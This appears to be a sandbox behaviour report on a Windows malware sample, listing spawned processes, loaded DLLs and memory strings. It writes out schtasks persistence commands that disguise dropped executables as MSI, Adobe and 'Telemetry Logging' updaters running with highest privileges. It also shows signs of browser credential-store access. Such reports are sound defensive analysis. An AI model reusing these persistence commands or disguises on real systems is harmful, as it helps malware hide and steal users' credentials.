Source: file.exe, 00000000.00000002.3798251494.00000000006BA000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: file.exe, 00000000.00000003.1434474770.0000000005D92000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1436440203.0000000005D92000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1433335851.0000000006211000.00000004.00000020.00020000.00000000.sdmp, yDQk2lzvekOJLogin Data.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe ReversingLabs: Detection: 26%
Source: file.exe Virustotal: Detection: 23%
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 LG" /sc ONLOGON /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\span8fTqI7Z4TQTK\IHobmyUUXF8jFZ9HHCK7.exe "C:\Users\user\AppData\Local\Temp\span8fTqI7Z4TQTK\IHobmyUUXF8jFZ9HHCK7.exe"
Source: C:\Users\user\AppData\Local\Temp\span8fTqI7Z4TQTK\IHobmyUUXF8jFZ9HHCK7.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe
Source: unknown Process created: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c LG" /sc ONLOGON /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\span8fTqI7Z4TQTK\RthubJXJJOhKyKgs0z_b.exe "C:\Users\user\AppData\Local\Temp\span8fTqI7Z4TQTK\RthubJXJJOhKyKgs0z_b.exe"
Source: unknown Process created: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe
Source: unknown Process created: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe
Source: C:\Users\user\AppData\Local\Temp\span8fTqI7Z4TQTK\RthubJXJJOhKyKgs0z_b.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe "C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe"
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe "C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe"
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe "C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe"
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe "C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe"
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe "C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe"
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Users\user\AppData\Local\Temp\span8fTqI7Z4TQTK\RthubJXJJOhKyKgs0z_b.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 HR" /sc HOURLY /rl HIGHEST Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 LG" /sc ONLOGON /rl HIGHEST Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\span8fTqI7Z4TQTK\IHobmyUUXF8jFZ9HHCK7.exe "C:\Users\user\AppData\Local\Temp\span8fTqI7Z4TQTK\IHobmyUUXF8jFZ9HHCK7.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c HR" /sc HOURLY /rl HIGHEST Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c LG" /sc ONLOGON /rl HIGHEST Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\span8fTqI7Z4TQTK\RthubJXJJOhKyKgs0z_b.exe "C:\Users\user\AppData\Local\Temp\span8fTqI7Z4TQTK\RthubJXJJOhKyKgs0z_b.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span8fTqI7Z4TQTK\IHobmyUUXF8jFZ9HHCK7.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe" Jump to behavior
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span8fTqI7Z4TQTK\RthubJXJJOhKyKgs0z_b.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe" Jump to behavior
Source: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: d3d10warp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dxcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: d2d1.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span8fTqI7Z4TQTK\IHobmyUUXF8jFZ9HHCK7.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span8fTqI7Z4TQTK\IHobmyUUXF8jFZ9HHCK7.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span8fTqI7Z4TQTK\IHobmyUUXF8jFZ9HHCK7.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span8fTqI7Z4TQTK\IHobmyUUXF8jFZ9HHCK7.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span8fTqI7Z4TQTK\RthubJXJJOhKyKgs0z_b.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span8fTqI7Z4TQTK\RthubJXJJOhKyKgs0z_b.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span8fTqI7Z4TQTK\RthubJXJJOhKyKgs0z_b.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span8fTqI7Z4TQTK\RthubJXJJOhKyKgs0z_b.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe Section loaded: wldp.dll Jump to behavior
Source: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Section loaded: wldp.dll
